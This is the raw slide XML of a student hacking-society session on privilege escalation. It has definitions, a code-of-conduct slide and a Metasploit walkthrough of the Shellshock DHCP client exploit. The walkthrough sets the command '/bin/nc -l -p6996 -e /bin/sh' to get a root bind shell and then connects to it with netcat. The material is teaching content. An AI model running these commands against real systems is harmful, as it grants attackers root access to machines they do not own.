              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>dhclient_bash_env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> which is used for DHCP Client Bash Environment Variable Code Injection (Shellshock)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use auxiliary/server/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dhclient_bash_env</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Run ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>’ to get information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Set up module parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set SVRHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_DHCP_server_IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3895874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ko-KR" dirty="0"/>
              <a:t>Exploit Shellshock vulnerability</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sz="1500" dirty="0"/>
              <a:t>Set the code that you want to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>throught</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> the BASH shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set CMD /bin/nc -l -p6996 -e /bin/sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> this will bind and listen to port 6996 in your DHCP server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Set NETMASK what is netmask write it later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>set NETMASK 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Result  you set up a netcat listener with root privileges on port 6996 piping out a BASH shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In your command prompt, run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>c::\nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_DHCP_server_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 6996</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>You can check by running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> whoami</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394800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265500" y="238625"/>
            <a:ext cx="4115700" cy="247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Upcoming Sessions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p1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What’s up next?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.shefesh.com/sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p1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30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Nov – OSINT</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Dec – Hack the Box</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Dec – Xmas Session</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Any Questions?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740350" y="4208475"/>
            <a:ext cx="3663300" cy="5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300">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>www.shefesh.com</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Thanks for coming!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Google Shape;103;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225075" y="1285325"/>
            <a:ext cx="2693850" cy="26996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dirty="0"/>
              <a:t>Before proceeding past this point you must read and agree to our Code of Conduct - this is a requirement from the University for us to operate as a society. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you have any doubts or need anything clarified, please ask a member of the committee.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Breaching the Code of Conduct = immediate ejection and further consequences.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Code of Conduct can be found at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://shefesh.com/downloads/SESH%20Code%20of%20Conduct.pdf</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p14"/>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Code of Conduct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Privilege Escalation</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75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Privilege escalation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Users that aren’t permitted to have rights they are not supposed to have, such as deleting, editing files, view hidden information, or install programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why would someone perform privilege escalation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Read/Write sensitive files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Persist easily between reboots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Insert a permanent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>bacdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/tactics/TA0004/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> for lists of privilege escalation techniques.</a:t>
            </a:r>
            <a:endParaRPr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1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Horizontal Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers gain access directly to an account they intend to perform actions with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier to pull off as you don’t have to elevate permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be done with phishing via emails, messages etc.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;8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altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vertical Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Attackers gain access to an account and elevate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>the permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Requires more understanding of vulnerabilities and hacking tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
